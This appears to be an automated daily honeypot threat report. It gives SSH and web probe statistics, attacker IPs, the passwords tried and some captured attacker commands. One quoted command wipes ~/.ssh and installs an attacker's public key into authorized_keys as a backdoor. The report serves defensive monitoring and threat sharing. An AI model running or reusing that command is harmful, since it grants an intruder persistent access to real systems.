Thursday, 14 May 2026 πŸ’€ critical

Daily Threat Report

1,245 SSH Connections
1,333 Login Attempts
381 Commands Run
88 SSH Unique IPs
6,331 Protocol Events
22 Protocol IPs
60 Web Hits
30 Web Service IPs

Top Attacker IPs

  1. 🌐 36.91.166.189 BGPβ†—
  2. 🌐 37.111.53.110 BGPβ†—
  3. 🌐 87.251.64.176 BGPβ†—
  4. 🌐 116.110.147.204 BGPβ†—
  5. 🌐 193.32.162.145 BGPβ†—

Top Passwords Tried

  1. admin
  2. 3245gs5662d34
  3. 345gs5662d34
  4. solana
  5. 123456

🌐 WEB HONEYPOT β€” HoneyAI HTTP

AI-generated fake HTTP responses served to 60 scanner requests from 30 unique IPs (local, offline).

Top Paths Probed

  1. /login
  2. /
  3. /SDK/webLanguage
  4. /zc?action=getInfo
  5. /favicon.ico

Top User-Agents

  1. Go-http-client/1.1
  2. Mozilla/5.0 (compatible
  3. Googlebot/2.1
  4. +http://www.google.com/bot.html)
  5. Mozilla/5.0 (Windows NT 10.0
  6. Win64
  7. x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
  8. visionheight.com/scan Mozilla/5.0 (Macintosh
  9. Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36
  10. Mozilla/5.0 (compatible
  11. Infrawatch/1.0
  12. +https://infrawat.ch/)
# Automatic multi-platform threat intel reporting
$ honeypot-report.sh --since 24h
β†’ 22 IPs β†’ AbuseIPDB  (community confidence scores updated)
β†’ 22 IPs β†’ AlienVault OTX  (pulse indicators added)
β†’ 22 IPs β†’ Blocklist.de  (auto-ban list updated)
β†’ 22 IPs β†’ DShield/SANS  (global threat feed updated)

🀣 ATTACKER COMEDY CORNER

Real attempts. No actors were harmed in the making of this honeypot.

πŸ”‘ Hall of Shame β€” Passwords

admin
3245gs5662d34
345gs5662d34
solana
P@ssw0rd

πŸ’» Commands They Tried

/bin/./uname -s -v -n -r -m
cd ~ && rm -rf .ssh && mkdir .ssh && echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
uname -a
uname -s -m

These are real credentials and commands attempted by automated scanners and script kiddies. Logged, reported, and immortalized.

Automated report for 14 de May de 2026. Recorded 1245 SSH connections on the Cowrie honeypot and 6331 multi-protocol events on OpenCanary, from 110 unique IPs. 22 IPs were automatically reported to the AbuseIPDB community database.

SSH Activity (Cowrie)

The SSH honeypot received 1333 login attempts from 88 unique IPs. Attackers executed 381 commands after gaining simulated system access.

Multi-Protocol Activity (OpenCanary)

Detected 6331 events across services including FTP, Telnet, MySQL, Redis, VNC and Git from 22 distinct IPs. All events are access attempts against simulated production services.

HTTP Web Honeypot (Galah LLM)

The web honeypot received 60 HTTP requests from real scanners across 30 unique IPs. Each attacker received a fake response generated in real time by the local AI model qwen2.5:0.5b (Ollama, no internet connection required).

Network IDS (Suricata)

The network intrusion detection system generated 4036 alerts from 255 unique source IPs. Suricata monitors all traffic on the primary network interface using Emerging Threats + AlienVault OTX rulesets.

← All Reports πŸ›‘οΈ Subscribe to blocklists β†’